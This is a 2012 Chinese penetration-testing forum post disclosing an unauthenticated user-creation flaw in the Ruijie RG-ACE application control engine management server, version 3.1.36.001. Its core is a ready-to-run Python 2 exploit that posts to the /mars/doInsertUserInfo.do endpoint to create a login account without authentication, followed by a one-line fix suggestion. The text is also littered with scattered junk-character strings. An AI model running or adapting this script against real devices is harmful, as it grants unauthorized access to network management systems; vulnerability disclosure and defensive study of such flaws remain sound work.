中国网络渗透测试联盟

标题: 锐捷应用控制引擎管理服务器可以增加用户 [打印本页]

---

作者: admin    时间: 2012-12-10 10:16
标题: 锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
, h3 P/ X) v7 S; p: Q7 {8 b9 I

0 q9 u2 s9 F6 z2 v测试的具体版本是
5 U( z* z* [: v% @产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
4 N$ w* r4 F) P8 b/ V# f: w" D编译时间: 201104291730
8 W: J) K6 @8 R3 N) F) h

# r/ v( Q. p: C* `! m漏洞证明：
. r4 v4 i* f9 K$ ~' V


; {0 s& d3 J7 G1 C: r


4 V" g' _3 z: a2 L, p执行脚本
! n% _' J/ C4 V% {#! /usr/bin/env python
9 O$ J3 T8 b7 e+ {: O) t8 U) ]#coding=gbk
' z0 m: b3 Y* n+ _# k. {) b; u8 Q- A#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
6 u, F; T' T( l& ^' q! Wurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
( k3 \3 f1 {1 I: \, W4 B("useractionname","addButtonValue"),
6 C# t, v  B" |; ~1 r("useropermanager","userManager"),
("userName","t"), #######账号自己加
9 b) Y. D) F6 J("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
5 Z; ]& }: T  Q% T8 c9 Y& O("email",""),
! d5 [: i: Q8 A- I2 B+ A("mobilePhone",""),
) A% F1 z2 b$ u; s7 p("officePhone",""),
' C9 t0 n' R7 @% c8 f("addr",""),
' @  m/ q5 x0 U4 [. w" n("submit","确定"))
urllib2.install_opener(opener)
3 s+ `% Y6 |% K3 g- U5 Z/ \; pp=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

- q& U$ [! w5 }登录，连接设备
0 }# D# W6 R' n! w% u9 e

7 h0 l/ _- }: T2 }1 T+ m; l

3 W, F7 r2 Z. C8 G4 |
$ m" z! `) `5 Z( f9 V默认的管理员admin权限更大点
' G% Z& w" i8 h+ K" ~# I

- |+ d/ X- \, W* C


4 n8 f+ z7 ?( f( q* X7 l/ p. b( i修复方案：
加强对接口的权限验证
1 w: ~2 E2 d1 K5 O! Q( I$ i7 }
% `8 `# X4 h: h) r3 R; p8 E

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2